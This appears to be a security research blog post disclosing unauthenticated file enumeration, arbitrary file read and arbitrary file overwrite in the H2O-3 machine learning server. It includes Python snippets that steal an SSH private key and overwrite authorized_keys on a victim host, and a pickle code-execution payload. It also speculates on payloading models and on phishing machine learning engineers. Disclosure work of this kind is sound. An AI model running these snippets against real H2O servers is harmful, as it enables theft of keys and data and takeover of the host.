H2O-3 is a low-code tool that abstracts away most of the details of creating a machine learning model. It is the most popular open-source repository from h2o.ai, with more than 500,000 downloads a month. Users either download the standalone h2o.jar file and run the server directly, or import the h2o library in Python or R and initialize the server with h2o.init().
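As a quick illustration of the second workflow, here is a minimal Python sketch; the standalone route is simply running java -jar h2o.jar from a terminal.

```python
# Minimal sketch of the programmatic workflow: h2o.init() starts a local H2O
# server (a JVM) if one is not already running, then connects the client to it.
import h2o

h2o.init()                      # defaults to localhost:54321
print(h2o.cluster().version)    # confirm the client is attached to a running cluster
```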
H2O allows users to see the entire filesystem’s file and directory paths through its Typeahead API call.
H2O allows users to read any file on the system.
H2O allows users to overwrite any file on the filesystem.
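To make the three issues concrete, here is a rough sketch of how each can be driven through H2O's standard Python client against a reachable server. The host name and file paths are hypothetical, the endpoint and field names follow H2O's public REST schema, and this is an illustration of the API surface rather than a polished exploit.

```python
import h2o

# Attach to a remote H2O instance (hypothetical host).
h2o.connect(ip="h2o.victim.internal", port=54321)

# 1. Directory and file enumeration via the Typeahead endpoint
#    (endpoint and "matches" field per H2O's public REST schema).
listing = h2o.api("GET /3/Typeahead/files", data={"src": "/home/", "limit": 1000})
print(listing["matches"])

# 2. Arbitrary file read: import any server-side file as a data frame.
secrets = h2o.import_file("/home/ubuntu/.ssh/id_rsa")            # hypothetical path
print(secrets.as_data_frame(use_pandas=False))

# 3. Arbitrary file overwrite: export a frame to any server-side path.
frame = h2o.H2OFrame({"c0": ["attacker-controlled content"]})
h2o.export_file(frame, "/home/ubuntu/.ssh/authorized_keys", force=True)  # hypothetical path
```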
Via these built-in vulnerabilities, attackers have a direct and stealthy path to stealing Secure Shell (SSH) keys, API keys, models, data, and absolutely anything else that interests them on the H2O server. Through the file overwrite vulnerability, an attacker can cause a denial of service or poison datasets with malicious data.
The H2O maintainers were contacted multiple times about these vulnerabilities over the course of several months with no response.
One should note that no actual exploitation was needed: H2O was (and is, at the time of this writing) insecure by design. Initially, we assumed there must be a warning in the H2O documentation that the tool is designed to be deployed only on the localhost interface and never exposed remotely. That would largely mitigate these vulnerabilities, since a user would only be able to reach files they could already access as a local user. This is not the case, however: H2O implements various methods of authentication, implying the server is designed to be used by multiple users. Additionally, there does not appear to be a safe way of running H2O from the h2o.jar file at all.
The H2O quickstart guide simply instructs users to download h2o.jar and run it with java -jar h2o.jar.
If one follows this guide and runs H2O from the h2o.jar file, they have exposed their entire file system to all remote computers on the network. Even specifying arguments such as java -jar h2o.jar -ip 127.0.0.1 still exposes the server’s file system to the entire network. The only safe way of running H2O appears to be using the programmatic interface and not overriding the bind_to_localhost argument in h2o.init().
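If our reading is correct, the only built-in safeguard is the bind_to_localhost flag exposed by the programmatic interface; a minimal sketch of the distinction:

```python
import h2o

# Default behaviour: the locally launched server only accepts REST calls that
# originate from localhost (bind_to_localhost defaults to True).
h2o.init()

# Overriding the default opens the REST API -- and with it the file read/write
# primitives above -- to anything that can reach the port:
# h2o.init(bind_to_localhost=False)
```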
A realistic attack path for an outsider exploiting this vulnerability against an average organization:
A realistic attack path for an outside attacker exploiting this vulnerability against a security-hardened organization is as follows:
We have noticed a couple of patterns in the security research we’ve conducted on machine learning tools. One, overly permissive file system access is common. Two, sanitization during the loading of data and models is often overlooked. Both problems can lead to remote code execution, and we feel there is strong potential for H2O to contain such a vulnerability.
There are two likely paths to remote code execution. The first is abuse of one of the many file save functions to either install a backdoor or overwrite a file used for remote login, such as SSH keys. H2O has many such functions that write remote user input to disk; however, so far in our research there has usually been a constraint on the format of the output file. An example is the arbitrary file overwrite vulnerability above, which writes a CSV-formatted file rather than the raw user input that was parsed into the frame. There are many such file-saving functions in H2O, and further exploration should be performed to confirm or deny whether any of them can write raw data to disk remotely.
Second, a common issue in the machine learning world is the use of insecure model serialization formats. The widely used Python library pickle, notable as the serialization underlying PyTorch’s default format for model weights, allows arbitrary code to execute when a file is loaded.
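The pickle problem can be demonstrated in a few lines: any object may define a __reduce__ method that tells the deserializer to call an arbitrary function, so merely loading a file executes attacker-chosen code. A minimal, self-contained illustration (not H2O-specific):

```python
import os
import pickle

class Malicious:
    # pickle consults __reduce__ to learn how to rebuild the object; returning
    # (os.system, (cmd,)) makes deserialization execute the command instead.
    def __reduce__(self):
        return (os.system, ("echo code executed at load time",))

payload = pickle.dumps(Malicious())
pickle.loads(payload)   # the command runs here, before any "model" is ever used
```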
H2O doesn’t use pickle; it uses a few custom model formats: MOJO, POJO, and binary. If a model can be payloaded with command injection, then uploaded to H2O and used for inference, we would have remote code execution.
MOJO (Model Object, Optimized) models can be uploaded remotely to the server and used for inference, but this format is largely just model metadata along with the model weights, which makes it an unlikely injection target. The contents of a MOJO zip file can be inspected directly, as sketched below.
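In this sketch the file name and host are hypothetical, and we assume h2o.upload_mojo is available in the target H2O version:

```python
import zipfile
import h2o

# Inspect a MOJO archive locally (file name is hypothetical): it is essentially
# a metadata descriptor plus serialized parameter and domain data.
with zipfile.ZipFile("GBM_model.zip") as z:
    print(z.namelist())

# MOJOs can nonetheless be uploaded to a remote server and used for scoring.
h2o.connect(ip="h2o.victim.internal", port=54321)   # hypothetical host
model = h2o.upload_mojo("GBM_model.zip")
```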
Binary models are an H2O-specific Java serialization format called Iced, which can also be uploaded to the server and used for inference. This is the most likely candidate for code injection given the significant number of Java deserialization attacks seen in the past. Although we were unsuccessful in injecting into these models in the time we had to investigate, this area of H2O security research warrants a deeper dive: code injection into the binary model format would directly lead to remote code execution.
Last, POJO models are Plain Old Java Objects. One can payload these models with code execution in a way that doesn’t affect the model’s ability to predict, for example by modifying the generated Java source so the model runs an arbitrary command before it prints its predictions.
While this makes a useful attack as an innocuous-looking attachment in a phishing email to a machine learning engineer, POJO models can’t be uploaded to the H2O server, nor does conversion into MOJO format preserve the arbitrary code execution.